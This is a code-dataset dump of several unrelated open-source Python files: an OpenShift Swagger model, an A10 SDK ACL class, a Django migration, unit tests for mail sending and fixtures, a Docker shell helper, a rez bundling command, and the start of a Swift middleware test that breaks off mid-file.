code
stringlengths 2
1.05M
| repo_name
stringlengths 5
104
| path
stringlengths 4
251
| language
stringclasses 1
value | license
stringclasses 15
values | size
int32 2
1.05M
|
---|---|---|---|---|---|
# coding: utf-8
"""
OpenAPI spec version:
Generated by: https://github.com/swagger-api/swagger-codegen.git
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
from pprint import pformat
from six import iteritems
import re
class V1ImageSource(object):
"""
NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
"""
operations = [
]
# The key is attribute name
# and the value is attribute type.
swagger_types = {
'_from': 'V1ObjectReference',
'paths': 'list[V1ImageSourcePath]',
'pull_secret': 'V1LocalObjectReference'
}
# The key is attribute name
# and the value is json key in definition.
attribute_map = {
'_from': 'from',
'paths': 'paths',
'pull_secret': 'pullSecret'
}
def __init__(self, _from=None, paths=None, pull_secret=None):
"""
V1ImageSource - a model defined in Swagger
"""
self.__from = _from
self._paths = paths
self._pull_secret = pull_secret
@property
def _from(self):
"""
Gets the _from of this V1ImageSource.
From is a reference to an ImageStreamTag, ImageStreamImage, or DockerImage to copy source from.
:return: The _from of this V1ImageSource.
:rtype: V1ObjectReference
"""
return self.__from
@_from.setter
def _from(self, _from):
"""
Sets the _from of this V1ImageSource.
From is a reference to an ImageStreamTag, ImageStreamImage, or DockerImage to copy source from.
:param _from: The _from of this V1ImageSource.
:type: V1ObjectReference
"""
self.__from = _from
@property
def paths(self):
"""
Gets the paths of this V1ImageSource.
Paths is a list of source and destination paths to copy from the image.
:return: The paths of this V1ImageSource.
:rtype: list[V1ImageSourcePath]
"""
return self._paths
@paths.setter
def paths(self, paths):
"""
Sets the paths of this V1ImageSource.
Paths is a list of source and destination paths to copy from the image.
:param paths: The paths of this V1ImageSource.
:type: list[V1ImageSourcePath]
"""
self._paths = paths
@property
def pull_secret(self):
"""
Gets the pull_secret of this V1ImageSource.
PullSecret is a reference to a secret to be used to pull the image from a registry If the image is pulled from the OpenShift registry, this field does not need to be set.
:return: The pull_secret of this V1ImageSource.
:rtype: V1LocalObjectReference
"""
return self._pull_secret
@pull_secret.setter
def pull_secret(self, pull_secret):
"""
Sets the pull_secret of this V1ImageSource.
PullSecret is a reference to a secret to be used to pull the image from a registry If the image is pulled from the OpenShift registry, this field does not need to be set.
:param pull_secret: The pull_secret of this V1ImageSource.
:type: V1LocalObjectReference
"""
self._pull_secret = pull_secret
def to_dict(self):
"""
Returns the model properties as a dict
"""
result = {}
for attr, _ in iteritems(V1ImageSource.swagger_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
result[attr] = value
return result
def to_str(self):
"""
Returns the string representation of the model
"""
return pformat(self.to_dict())
def __repr__(self):
"""
For `print` and `pprint`
"""
return self.to_str()
def __eq__(self, other):
"""
Returns true if both objects are equal
"""
return self.__dict__ == other.__dict__
def __ne__(self, other):
"""
Returns true if both objects are not equal
"""
return not self == other
| detiber/lib_openshift | lib_openshift/models/v1_image_source.py | Python | apache-2.0 | 5,181 |
from a10sdk.common.A10BaseClass import A10BaseClass
class VeCfg(A10BaseClass):
"""This class does not support CRUD Operations please use parent.
:param ve_end: {"type": "number", "description": "VE port", "format": "number"}
:param ve_start: {"type": "number", "description": "VE port (VE Interface number)", "format": "number"}
:param DeviceProxy: The device proxy for REST operations and session handling. Refer to `common/device_proxy.py`
"""
def __init__(self, **kwargs):
self.ERROR_MSG = ""
self.b_key = "ve-cfg"
self.DeviceProxy = ""
self.ve_end = ""
self.ve_start = ""
for keys, value in kwargs.items():
setattr(self,keys, value)
class EthCfg(A10BaseClass):
"""This class does not support CRUD Operations please use parent.
:param ethernet_start: {"type": "number", "description": "Ethernet port (Ethernet Interface number)", "format": "interface"}
:param ethernet_end: {"type": "number", "description": "Ethernet port", "format": "interface"}
:param DeviceProxy: The device proxy for REST operations and session handling. Refer to `common/device_proxy.py`
"""
def __init__(self, **kwargs):
self.ERROR_MSG = ""
self.b_key = "eth-cfg"
self.DeviceProxy = ""
self.ethernet_start = ""
self.ethernet_end = ""
for keys, value in kwargs.items():
setattr(self,keys, value)
class AclV4(A10BaseClass):
"""Class Description::
IPv4 ACL for SSH service.
Class acl-v4 supports CRUD Operations and inherits from `common/A10BaseClass`.
This class is the `"PARENT"` class for this module.`
:param ve_cfg: {"minItems": 1, "items": {"type": "object"}, "uniqueItems": true, "type": "array", "array": [{"properties": {"ve-end": {"type": "number", "description": "VE port", "format": "number"}, "ve-start": {"type": "number", "description": "VE port (VE Interface number)", "format": "number"}, "optional": true}}]}
:param acl_id: {"description": "ACL id", "format": "number", "type": "number", "maximum": 199, "minimum": 1, "optional": false}
:param uuid: {"description": "uuid of the object", "format": "string", "minLength": 1, "modify-not-allowed": 1, "optional": true, "maxLength": 64, "type": "string"}
:param eth_cfg: {"minItems": 1, "items": {"type": "object"}, "uniqueItems": true, "type": "array", "array": [{"properties": {"ethernet-start": {"type": "number", "description": "Ethernet port (Ethernet Interface number)", "format": "interface"}, "ethernet-end": {"type": "number", "description": "Ethernet port", "format": "interface"}, "optional": true}}]}
:param DeviceProxy: The device proxy for REST operations and session handling. Refer to `common/device_proxy.py`
URL for this object::
`https://<Hostname|Ip address>//axapi/v3/enable-management/service/ssh/acl-v4/{acl_id}`.
"""
def __init__(self, **kwargs):
self.ERROR_MSG = ""
self.required = [ "acl_id"]
self.b_key = "acl-v4"
self.a10_url="/axapi/v3/enable-management/service/ssh/acl-v4/{acl_id}"
self.DeviceProxy = ""
self.ve_cfg = []
self.acl_id = ""
self.uuid = ""
self.eth_cfg = []
for keys, value in kwargs.items():
setattr(self,keys, value)
| amwelch/a10sdk-python | a10sdk/core/enable/enable_management_service_ssh_acl_v4.py | Python | apache-2.0 | 3,405 |
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('server', '0015_auto_20150819_1501'),
]
operations = [
migrations.AlterField(
model_name='apikey',
name='private_key',
field=models.CharField(max_length=255, db_index=True),
),
migrations.AlterField(
model_name='apikey',
name='public_key',
field=models.CharField(max_length=255, db_index=True),
),
migrations.AlterField(
model_name='machine',
name='first_checkin',
field=models.DateTimeField(db_index=True, auto_now_add=True, null=True),
),
migrations.AlterField(
model_name='machine',
name='hd_space',
field=models.CharField(db_index=True, max_length=256, null=True, blank=True),
),
migrations.AlterField(
model_name='machine',
name='hd_total',
field=models.CharField(db_index=True, max_length=256, null=True, blank=True),
),
migrations.AlterField(
model_name='machine',
name='last_checkin',
field=models.DateTimeField(db_index=True, null=True, blank=True),
),
migrations.AlterField(
model_name='machine',
name='last_puppet_run',
field=models.DateTimeField(db_index=True, null=True, blank=True),
),
migrations.AlterField(
model_name='machine',
name='manifest',
field=models.CharField(db_index=True, max_length=256, null=True, blank=True),
),
migrations.AlterField(
model_name='machine',
name='memory',
field=models.CharField(db_index=True, max_length=256, null=True, blank=True),
),
migrations.AlterField(
model_name='machine',
name='memory_kb',
field=models.IntegerField(default=0, db_index=True),
),
migrations.AlterField(
model_name='machine',
name='munki_version',
field=models.CharField(db_index=True, max_length=256, null=True, blank=True),
),
migrations.AlterField(
model_name='machine',
name='operating_system',
field=models.CharField(db_index=True, max_length=256, null=True, blank=True),
),
migrations.AlterField(
model_name='machine',
name='puppet_errors',
field=models.IntegerField(default=0, db_index=True),
),
migrations.AlterField(
model_name='machine',
name='serial',
field=models.CharField(unique=True, max_length=100, db_index=True),
),
migrations.AlterField(
model_name='machinegroup',
name='key',
field=models.CharField(null=True, editable=False, max_length=255, blank=True, unique=True, db_index=True),
),
migrations.AlterField(
model_name='osqueryresult',
name='hostidentifier',
field=models.CharField(db_index=True, max_length=255, null=True, blank=True),
),
migrations.AlterField(
model_name='osqueryresult',
name='name',
field=models.CharField(max_length=255, db_index=True),
),
migrations.AlterField(
model_name='osqueryresult',
name='unix_time',
field=models.IntegerField(db_index=True),
),
migrations.AlterField(
model_name='pendingappleupdate',
name='update',
field=models.CharField(db_index=True, max_length=255, null=True, blank=True),
),
migrations.AlterField(
model_name='pendingappleupdate',
name='update_version',
field=models.CharField(db_index=True, max_length=256, null=True, blank=True),
),
migrations.AlterField(
model_name='pendingupdate',
name='update',
field=models.CharField(db_index=True, max_length=255, null=True, blank=True),
),
migrations.AlterField(
model_name='pendingupdate',
name='update_version',
field=models.CharField(db_index=True, max_length=255, null=True, blank=True),
),
]
| chasetb/sal | server/migrations/0016_auto_20151026_0851.py | Python | apache-2.0 | 4,470 |
from django.conf import settings
from django.core import mail
from rdmo.core.mail import send_mail
def test_send_mail(db):
send_mail('Subject', 'Message', to=['[email protected]'])
assert len(mail.outbox) == 1
assert mail.outbox[0].subject == '[example.com] Subject'
assert mail.outbox[0].body == 'Message'
assert mail.outbox[0].from_email == settings.DEFAULT_FROM_EMAIL
assert mail.outbox[0].to == ['[email protected]']
assert mail.outbox[0].cc == []
assert mail.outbox[0].bcc == []
assert mail.outbox[0].attachments == []
def test_send_mail_cc(db):
send_mail('Subject', 'Message', to=['[email protected]'], cc=['[email protected]'])
assert len(mail.outbox) == 1
assert mail.outbox[0].subject == '[example.com] Subject'
assert mail.outbox[0].body == 'Message'
assert mail.outbox[0].from_email == settings.DEFAULT_FROM_EMAIL
assert mail.outbox[0].to == ['[email protected]']
assert mail.outbox[0].cc == ['[email protected]']
assert mail.outbox[0].bcc == []
assert mail.outbox[0].attachments == []
def test_send_mail_bcc(db):
send_mail('Subject', 'Message', bcc=['[email protected]'])
assert len(mail.outbox) == 1
assert mail.outbox[0].subject == '[example.com] Subject'
assert mail.outbox[0].body == 'Message'
assert mail.outbox[0].from_email == settings.DEFAULT_FROM_EMAIL
assert mail.outbox[0].to == []
assert mail.outbox[0].cc == []
assert mail.outbox[0].bcc == ['[email protected]']
assert mail.outbox[0].attachments == []
def test_send_mail_from_email(db):
send_mail('Subject', 'Message', from_email='[email protected]', to=['[email protected]'])
assert len(mail.outbox) == 1
assert mail.outbox[0].subject == '[example.com] Subject'
assert mail.outbox[0].body == 'Message'
assert mail.outbox[0].from_email == '[email protected]'
assert mail.outbox[0].to == ['[email protected]']
assert mail.outbox[0].cc == []
assert mail.outbox[0].bcc == []
assert mail.outbox[0].attachments == []
def test_send_mail_from_attachments(db):
send_mail('Subject', 'Message', to=['[email protected]'], attachments=[
('Attachment', b'attachment', 'plain/text')
])
assert len(mail.outbox) == 1
assert mail.outbox[0].subject == '[example.com] Subject'
assert mail.outbox[0].body == 'Message'
assert mail.outbox[0].from_email == settings.DEFAULT_FROM_EMAIL
assert mail.outbox[0].to == ['[email protected]']
assert mail.outbox[0].cc == []
assert mail.outbox[0].bcc == []
assert mail.outbox[0].attachments == [
('Attachment', b'attachment', 'plain/text')
]
| DMPwerkzeug/DMPwerkzeug | rdmo/core/tests/test_mail.py | Python | apache-2.0 | 2,649 |
# Copyright 2015 Alex Brandt
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import copy
import inspect
import logging
import typing # noqa (use mypy typing)
import unittest
import uuid
from torment import fixtures
from torment import contexts
logger = logging.getLogger(__name__)
class FixturesCreateUnitTest(unittest.TestCase):
def test_fixture_create_without_context(self) -> None:
'''torment.fixtures.Fixture() → TypeError'''
self.assertRaises(TypeError, fixtures.Fixture)
def test_fixture_create_with_context(self) -> None:
'''torment.fixtures.Fixture(context).context == context'''
c = unittest.TestCase()
f = fixtures.Fixture(c)
self.assertEqual(f.context, c)
class FixturesPropertyUnitTest(unittest.TestCase):
def setUp(self) -> None:
self.c = unittest.TestCase()
self.f = fixtures.Fixture(self.c)
def test_fixture_category(self) -> None:
'''torment.fixtures.Fixture(context).category == 'fixtures' '''
self.f.__module__ = unittest.mock.MagicMock(__name__ = 'test_torment.test_unit.test_fixtures.fixture_a44bc6dda6654b1395a8c2cbd55d964d')
self.assertEqual(self.f.category, 'fixtures')
def test_fixture_description(self) -> None:
'''torment.fixtures.Fixture(context).description == '94d7c58f6ee44683936c21cb84d1e458—torment.fixtures' '''
self.f.context.module = 'fixtures'
self.f.uuid = uuid.UUID('94d7c58f6ee44683936c21cb84d1e458')
self.assertEqual(self.f.description, '94d7c58f6ee44683936c21cb84d1e458—fixtures')
def test_fixture_name(self) -> None:
'''torment.fixtures.Fixture(context).name == 'test_94d7c58f6ee44683936c21cb84d1e458' '''
self.f.__class__.__name__ = '94d7c58f6ee44683936c21cb84d1e458'
self.assertEqual(self.f.name, 'test_94d7c58f6ee44683936c21cb84d1e458')
class ErrorFixturesPropertyUnitTest(unittest.TestCase):
def test_error_fixture_description(self) -> None:
'''torment.fixtures.ErrorFixture(context).description == 'expected → failure' '''
class fixture(fixtures.Fixture):
@property
def description(self) -> str:
return 'expected'
class error_fixture(fixtures.ErrorFixture, fixture):
def __init__(self, *args, **kwargs) -> None:
super().__init__(*args, **kwargs)
self.error = RuntimeError('failure')
c = unittest.TestCase()
e = error_fixture(c)
self.assertEqual(e.description, 'expected → failure')
class ErrorFixturesRunTest(unittest.TestCase):
def test_error_fixture_run(self) -> None:
'''torment.fixtures.ErrorFixture(context).run()'''
class fixture(fixtures.Fixture):
def run(self):
raise RuntimeError('failure')
class error_fixture(fixtures.ErrorFixture, fixture):
def __init__(self, *args, **kwargs) -> None:
super().__init__(*args, **kwargs)
self.error = RuntimeError('failure')
c = unittest.TestCase()
e = error_fixture(c)
e.run()
self.assertIsInstance(e.exception, RuntimeError)
self.assertEqual(e.exception.args, ( 'failure', ))
class OfUnitTest(unittest.TestCase):
def test_of_zero(self) -> None:
'''torment.fixtures.of(()) == []'''
self.assertEqual(len(fixtures.of(())), 0)
def test_of_many_without_subclasses(self) -> None:
'''torment.fixtures.of(( FixtureA, )) == []'''
class FixtureA(object):
def __init__(self, context) -> None:
pass
self.assertEqual(len(fixtures.of(( FixtureA, ))), 0)
def test_of_many_with_subclasses(self) -> None:
'''torment.fixtures.of(( FixtureA, )) == [ fixture_a, ]'''
class FixtureA(object):
def __init__(self, context) -> None:
pass
class FixtureB(FixtureA):
pass
result = fixtures.of(( FixtureA, ))
self.assertEqual(len(result), 1)
self.assertIsInstance(result[0], FixtureB)
class RegisterUnitTest(unittest.TestCase):
def setUp(self) -> None:
_ = unittest.mock.patch('torment.fixtures.inspect')
mocked_inspect = _.start()
self.addCleanup(_.stop)
mocked_inspect.configure_mock(**{ 'isclass': inspect.isclass, 'isfunction': inspect.isfunction, })
mocked_inspect.stack.return_value = ( None, ( None, 'test_unit/test_d43830e2e9624dd19c438b15250c5818.py', ), )
class ContextStub(object):
pass
self.context = ContextStub()
self.context.module = mocked_inspect.getmodule.return_value = 'stack'
self.ns = {} # type: Dict[str, Any]
self.class_name = 'f_d43830e2e9624dd19c438b15250c5818'
def test_zero_properties(self) -> None:
'''torment.fixtures.register({}, (), {})'''
fixtures.register(self.ns, ( fixtures.Fixture, ), {})
_ = self.ns[self.class_name](self.context)
self.assertEqual(_.uuid, uuid.UUID('d43830e2e9624dd19c438b15250c5818'))
def test_one_literal_properties(self) -> None:
'''torment.fixtures.register({}, (), { 'a': 'a', })'''
fixtures.register(self.ns, ( fixtures.Fixture, ), { 'a': 'a', })
_ = self.ns[self.class_name](self.context)
self.assertEqual(_.a, 'a')
def test_one_class_properties(self) -> None:
'''torment.fixtures.register({}, (), { 'a': class, })'''
class A(object):
pass
fixtures.register(self.ns, ( fixtures.Fixture, ), { 'a': A, })
_ = self.ns[self.class_name](self.context)
self.assertIsInstance(_.a, A)
def test_one_fixture_class_properties(self) -> None:
'''torment.fixtures.register({}, (), { 'a': fixture_class, })'''
class A(fixtures.Fixture):
pass
fixtures.register(self.ns, ( fixtures.Fixture, ), { 'a': A, })
_ = self.ns[self.class_name](self.context)
self.assertIsInstance(_.a, A)
self.assertEqual(_.a.context, self.context)
def test_one_function_properties(self) -> None:
'''torment.fixtures.register({}, (), { 'a': self → None, })'''
def a(self) -> None:
pass
fixtures.register(self.ns, ( fixtures.Fixture, ), { 'a': a, })
_ = self.ns[self.class_name](self.context)
self.assertIsNone(_.a)
def test_description_property(self) -> None:
'''torment.fixtures.register({}, (), { 'description': 'needle', })'''
fixtures.register(self.ns, ( fixtures.Fixture, ), { 'description': 'needle', })
_ = self.ns[self.class_name](self.context)
self.assertEqual(_.description, 'd43830e2e9624dd19c438b15250c5818—stack—needle')
def test_error_property(self) -> None:
'''torment.fixtures.register({}, (), { 'error': …, })'''
fixtures.register(self.ns, ( fixtures.Fixture, ), { 'error': { 'class': RuntimeError, }, })
_ = self.ns[self.class_name](self.context)
self.assertIsInstance(_.error, RuntimeError)
def test_mocks_mock_property(self) -> None:
'''torment.fixtures.register({}, (), { 'mocks': { 'symbol': …, }, }).setup()'''
_ = unittest.mock.patch('torment.fixtures._find_mocker')
mocked_fixtures_find_mocker = _.start()
self.addCleanup(_.stop)
mocked_fixtures_find_mocker.return_value = lambda: True
_ = unittest.mock.patch('torment.fixtures._prepare_mock')
mocked_fixtures_prepare_mock = _.start()
self.addCleanup(_.stop)
fixtures.register(self.ns, ( fixtures.Fixture, ), { 'mocks': { 'symbol': {}, }, })
_ = self.ns[self.class_name](self.context)
_.setup()
mocked_fixtures_find_mocker.assert_called_once_with('symbol', self.context)
mocked_fixtures_prepare_mock.assert_called_once_with(self.context, 'symbol')
class PrepareMockUnitTest(unittest.TestCase):
def setUp(self) -> None:
class ContextStub(contexts.TestContext):
mocked_symbol = unittest.mock.MagicMock(name = 'ContextStub.mocked_symbol')
self.context = ContextStub()
def test_prepare_mock_empty_call_list(self) -> None:
'''torment.fixtures._prepare_mock(ContextStub, 'symbol'): mock has empty call list'''
fixtures._prepare_mock(self.context, 'symbol')
self.assertEqual(len(self.context.mocked_symbol.mock_calls), 0)
def test_prepare_mock_side_effect_zero_dots(self) -> None:
'''tormnet.fixtures._prepare_mock(ContextStub, 'symbol', side_effect = range(2))'''
fixtures._prepare_mock(self.context, 'symbol', side_effect = range(2))
self.assertEqual(self.context.mocked_symbol(), 0)
self.assertEqual(self.context.mocked_symbol(), 1)
self.assertRaises(StopIteration, self.context.mocked_symbol)
def test_prepare_mock_return_value_zero_dots(self) -> None:
'''tormnet.fixtures._prepare_mock(ContextStub, 'symbol', return_value = 'a')'''
fixtures._prepare_mock(self.context, 'symbol', return_value = 'a')
self.assertEqual(self.context.mocked_symbol(), 'a')
def test_prepare_mock_return_value_one_dots(self) -> None:
'''tormnet.fixtures._prepare_mock(ContextStub, 'symbol.Sub', return_value = 'a')'''
fixtures._prepare_mock(self.context, 'symbol.Sub', return_value = 'a')
self.assertEqual(self.context.mocked_symbol.Sub(), 'a')
def test_prepare_mock_return_value_many_dots(self) -> None:
'''tormnet.fixtures._prepare_mock(ContextStub, 'symbol.sub.a.b.c', return_value = 'a')'''
fixtures._prepare_mock(self.context, 'symbol.sub.a.b.c', return_value = 'a')
self.assertEqual(self.context.mocked_symbol.sub.a.b.c(), 'a')
def test_prepare_mock_return_value_many_dots_second_level(self) -> None:
'''tormnet.fixtures._prepare_mock(ContextStub, 'symbol.sub.a.b.c', return_value = 'a')'''
class ContextStub(contexts.TestContext):
mocked_symbol_sub = unittest.mock.MagicMock(name = 'ContextStub.mocked_symbol_sub')
c = ContextStub()
fixtures._prepare_mock(c, 'symbol.sub.a.b.c', return_value = 'a')
self.assertEqual(c.mocked_symbol_sub.a.b.c(), 'a')
def test_prepare_mock_return_value_many_dots_all_levels(self) -> None:
'''tormnet.fixtures._prepare_mock(ContextStub, 'symbol.Sub.a.b.c', return_value = 'a')'''
class ContextStub(contexts.TestContext):
mocked_symbol_sub_a_b_c = unittest.mock.MagicMock(name = 'ContextStub.mocked_symbol_sub_a_b_c')
c = ContextStub()
fixtures._prepare_mock(c, 'symbol.Sub.a.b.c', return_value = 'a')
self.assertEqual(c.mocked_symbol_sub_a_b_c(), 'a')
class FindMockerUnitTest(unittest.TestCase):
def test_find_mocker_found_zero_levels(self) -> None:
'''tormnet.fixtures._find_mocker('symbol', ContextStub) == mock_symbol'''
class ContextStub(contexts.TestContext):
def mock_symbol(self):
pass
c = ContextStub()
method = fixtures._find_mocker('symbol', c)
self.assertEqual(method, c.mock_symbol)
def test_find_mocker_found_second_level(self) -> None:
'''tormnet.fixtures._find_mocker('symbol.Sub', ContextStub) == mock_symbol_Sub'''
class ContextStub(contexts.TestContext):
def mock_symbol_sub(self):
pass
c = ContextStub()
method = fixtures._find_mocker('symbol.Sub', c)
self.assertEqual(method, c.mock_symbol_sub)
def test_find_mocker_found_many_levels(self) -> None:
'''tormnet.fixtures._find_mocker('symbol.sub.a.b', ContextStub) == mock_symbol_sub_a_b'''
class ContextStub(contexts.TestContext):
def mock_symbol_sub_a_b(self):
pass
c = ContextStub()
method = fixtures._find_mocker('symbol.sub.a.b', c)
self.assertEqual(method, c.mock_symbol_sub_a_b)
def test_find_mocker_not_found(self) -> None:
'''tormnet.fixtures._find_mocker('fakesymbol', ContextStub) == lambda: False'''
class ContextStub(contexts.TestContext):
pass
c = ContextStub()
method = fixtures._find_mocker('fakesymbol', c)
self.assertFalse(method())
self.assertEqual(method.__name__, 'noop')
class ResolveFunctionsUnitTest(unittest.TestCase):
def setUp(self) -> None:
class StubFixture(object):
pass
self.f = StubFixture()
self.f.name = 'testing_fixture_stub'
self.o = copy.deepcopy(self.f)
def test_zero_functions(self) -> None:
'''torment.fixtures._resolve_functions({}, fixture)'''
fixtures._resolve_functions({}, self.f)
self.assertEqual(dir(self.o), dir(self.f))
def test_one_functions_without_parameters(self) -> None:
'''torment.fixtures._resolve_functions({ 'a': ø → None, }, fixture)'''
def a() -> None:
pass
fixtures._resolve_functions({ 'a': a, }, self.f)
self.assertEqual(id(self.f.a), id(a))
def test_one_functions_with_self_parameter(self) -> None:
'''torment.fixtures._resolve_functions({ 'a': self → None, }, fixture)'''
def a(self) -> None:
pass
fixtures._resolve_functions({ 'a': a, }, self.f)
self.assertIsNone(self.f.a)
def test_one_functions_with_self_parameter_raises_attributeerror(self) -> None:
'''torment.fixtures._resolve_functions({ 'a': self → self.b, }, fixture)'''
def a(self):
return self.b
fixtures._resolve_functions({ 'a': a, }, self.f)
self.assertEqual(id(self.f.a), id(a))
def test_many_functions(self) -> None:
'''torment.fixtures._resolve_functions({ 'a': self → self.b, 'b': self → None, }, fixture)'''
def a(self) -> None:
return self.b
def b(self) -> None:
pass
fixtures._resolve_functions({ 'a': a, 'b': b, }, self.f)
self.assertIsNone(self.f.a)
self.assertIsNone(self.f.b)
class UniqueClassNameUnitTest(unittest.TestCase):
def setUp(self) -> None:
self.uuid = uuid.uuid4()
def test_empty_namespace(self) -> None:
'''torment.fixtures._unique_class_name({}, uuid) == 'f_{uuid}' '''
n = fixtures._unique_class_name({}, self.uuid)
self.assertEqual(n, 'f_' + self.uuid.hex)
def test_one_namespace(self) -> None:
'''torment.fixtures._unique_class_name({ 'f_{uuid}': None, }, uuid) == 'f_{uuid}_1' '''
n = fixtures._unique_class_name({ 'f_' + self.uuid.hex: None, }, self.uuid)
self.assertEqual(n, 'f_' + self.uuid.hex + '_1')
def test_two_namespace(self) -> None:
'''torment.fixtures._unique_class_name({ 'f_{uuid}': None, 'f_{uuid}_1': None, }, uuid) == 'f_{uuid}_2' '''
n = fixtures._unique_class_name({ 'f_' + self.uuid.hex: None, 'f_' + self.uuid.hex + '_1': None, }, self.uuid)
self.assertEqual(n, 'f_' + self.uuid.hex + '_2')
| kumoru/torment | test_torment/test_unit/test_fixtures/__init__.py | Python | apache-2.0 | 15,613 |
# -*- coding: utf-8 -*-
#
# Copyright (C) 2015-2016 Hewlett Packard Enterprise Development LP
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
"""
Docker shell helper class module.
"""
from __future__ import unicode_literals, absolute_import
from __future__ import print_function, division
from topology.platforms.shell import PExpectShell, PExpectBashShell
class DockerExecMixin(object):
"""
Docker ``exec`` connection mixin for the Topology shell API.
This class implements a ``_get_connect_command()`` method that allows to
interact with a shell through a ``docker exec`` interactive command, and
extends the constructor to request for container related parameters.
:param str container: Container unique identifier.
:param str command: Command to be executed with the ``docker exec`` that
will launch an interactive session.
"""
def __init__(self, container, command, *args, **kwargs):
self._container = container
self._command = command
super(DockerExecMixin, self).__init__(*args, **kwargs)
def _get_connect_command(self):
return 'docker exec -i -t {} {}'.format(
self._container, self._command
)
class DockerShell(DockerExecMixin, PExpectShell):
"""
Generic ``docker exec`` shell for unspecified interactive session.
"""
class DockerBashShell(DockerExecMixin, PExpectBashShell):
"""
Specialized ``docker exec`` shell that will run and setup a bash
interactive session.
"""
__all__ = ['DockerShell', 'DockerBashShell']
| HPENetworking/topology_docker | lib/topology_docker/shell.py | Python | apache-2.0 | 2,063 |
# SPDX-License-Identifier: Apache-2.0
# Copyright Contributors to the Rez Project
'''
Bundle a context and its packages into a relocatable dir.
'''
from __future__ import print_function
import os
import os.path
import sys
def setup_parser(parser, completions=False):
group = parser.add_mutually_exclusive_group()
group.add_argument(
"-s", "--skip-non-relocatable", action="store_true",
help="leave non-relocatable packages non-bundled, rather than raise an error")
group.add_argument(
"-f", "--force", action="store_true",
help="bundle package even if it isn't relocatable (use at your own risk)")
group.add_argument(
"-n", "--no-lib-patch", action="store_true",
help="don't apply library patching within the bundle")
parser.add_argument(
"RXT",
help="context to bundle")
parser.add_argument(
"DEST_DIR",
help="directory to create bundle in; must not exist")
def command(opts, parser, extra_arg_groups=None):
from rez.utils.logging_ import print_error
from rez.bundle_context import bundle_context
from rez.resolved_context import ResolvedContext
rxt_filepath = os.path.abspath(os.path.expanduser(opts.RXT))
dest_dir = os.path.abspath(os.path.expanduser(opts.DEST_DIR))
# sanity checks
if not os.path.exists(rxt_filepath):
print_error("File does not exist: %s", rxt_filepath)
sys.exit(1)
context = ResolvedContext.load(rxt_filepath)
bundle_context(
context=context,
dest_dir=dest_dir,
force=opts.force,
skip_non_relocatable=opts.skip_non_relocatable,
verbose=opts.verbose,
patch_libs=(not opts.no_lib_patch)
)
| instinct-vfx/rez | src/rez/cli/bundle.py | Python | apache-2.0 | 1,729 |
# Copyright (c) 2012 OpenStack, LLC.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import array
import unittest
from shutil import rmtree
import os
from swift.common import ring, ondisk
from swift.common.utils import json
from swift.common.swob import Request, Response
from swift.common.middleware import list_endpoints
class FakeApp(object):
def __call__(self, env, start_response):
return Response(body="FakeApp")(env, start_response)
def start_response(*args):
pass
class TestListEndpoints(unittest.TestCase):
def setUp(self):
ondisk.HASH_PATH_SUFFIX = 'endcap'
ondisk.HASH_PATH_PREFIX = ''
self.testdir = os.path.join(os.path.dirname(__file__), 'ring')
rmtree(self.testdir, ignore_errors=1)
os.mkdir(self.testdir)
accountgz = os.path.join(self.testdir, 'account.ring.gz')
containergz = os.path.join(self.testdir, 'container.ring.gz')
objectgz = os.path.join(self.testdir, 'object.ring.gz')
# Let's make the rings slightly different so we can test
# that the correct ring is consulted (e.g. we don't consult
# the object ring to get nodes for a container)
intended_replica2part2dev_id_a = [
array.array('H', [3, 1, 3, 1]),
array.array('H', [0, 3, 1, 4]),
array.array('H', [1, 4, 0, 3])]
intended_replica2part2dev_id_c = [
array.array('H', [4, 3, 0, 1]),
array.array('H', [0, 1, 3, 4]),
array.array('H', [3, 4, 0, 1])]
intended_replica2part2dev_id_o = [
array.array('H', [0, 1, 0, 1]),
array.array('H', [0, 1, 0, 1]),
array.array('H', [3, 4, 3, 4])]
intended_devs = [{'id': 0, 'zone': 0, 'weight': 1.0,
'ip': '10.1.1.1', 'port': 6000,
'device': 'sda1'},
{'id': 1, 'zone': 0, 'weight': 1.0,
'ip': '10.1.1.1', 'port': 6000,
'device': 'sdb1'},
None,
{'id': 3, 'zone': 2, 'weight': 1.0,
'ip': '10.1.2.1', 'port': 6000,
'device': 'sdc1'},
{'id': 4, 'zone': 2, 'weight': 1.0,
'ip': '10.1.2.2', 'port': 6000,
'device': 'sdd1'}]
intended_part_shift = 30
ring.RingData(intended_replica2part2dev_id_a,
intended_devs, intended_part_shift).save(accountgz)
ring.RingData(intended_replica2part2dev_id_c,
intended_devs, intended_part_shift).save(containergz)
ring.RingData(intended_replica2part2dev_id_o,
intended_devs, intended_part_shift).save(objectgz)
self.app = FakeApp()
